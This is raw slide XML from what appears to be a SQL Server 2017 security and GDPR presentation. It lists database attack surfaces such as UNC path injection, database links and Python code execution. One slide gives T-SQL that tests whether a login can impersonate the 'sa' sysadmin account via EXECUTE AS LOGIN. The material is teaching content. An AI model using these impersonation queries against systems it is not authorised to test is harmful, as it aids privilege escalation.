              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ad-Hoc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Links</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UNC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Path</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457189" indent="-457189" defTabSz="1219170">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Python </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="03326C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>execution</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="03326C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114812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Objective and takeaways</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="269239" y="1189495"/>
            <a:ext cx="11653523" cy="3804888"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="560241" indent="-560241">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>modern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> for Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Privacy</a:t>
            </a:r>
            <a:endParaRPr lang="fi-FI" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="7965">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="63000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="560241" indent="-560241">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> SQL Server 2017 Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Features</a:t>
            </a:r>
            <a:endParaRPr lang="fi-FI" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="7965">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="63000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="560241" indent="-560241">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>Understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> GDPR and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>how</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> SQL Server 2017 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>meets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t> the GDPR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fi-FI" dirty="0" err="1">
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="7965">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                    <a:gs pos="63000">
                      <a:schemeClr val="tx1"/>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
              </a:rPr>
              <a:t>requirements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="7965">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="63000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="560241" indent="-560241">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:gradFill>
                <a:gsLst>
                  <a:gs pos="7965">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                  <a:gs pos="63000">
                    <a:schemeClr val="tx1"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="0"/>
              </a:gradFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325770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2254-64D2-E748-924F-A86698092C4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Impersonate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Privilege</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270EBE57-EFDB-0249-8582-6F13C02B92E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>manually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>check</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>impersonate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>login</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>execute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</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dirty="0"/>
              <a:t>EXECUTE AS LOGIN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>For</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>, EXECUTE AS USER </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F84E8986-AA2C-EF43-A9AD-19C5337BBBB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2468894"/>
            <a:ext cx="11041227" cy="15289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SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>‘) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>EXECUTE AS LOGIN = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:endParaRPr lang="cs-CZ" sz="1867" dirty="0">
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>SELECT SYSTEM_USER SELECT IS_SRVROLEMEMBER('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0" err="1">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>sysadmin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" sz="1867" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>')</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" sz="1867"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80991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8551-FF64-8846-A8F3-0A58791003E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Procedure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Trigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="cs-CZ" dirty="0" err="1"/>
              <a:t>Issues</a:t>
            </a:r>
            <a:endParaRPr lang="cs-CZ" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F78B023-A282-8946-B154-50533A906FD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
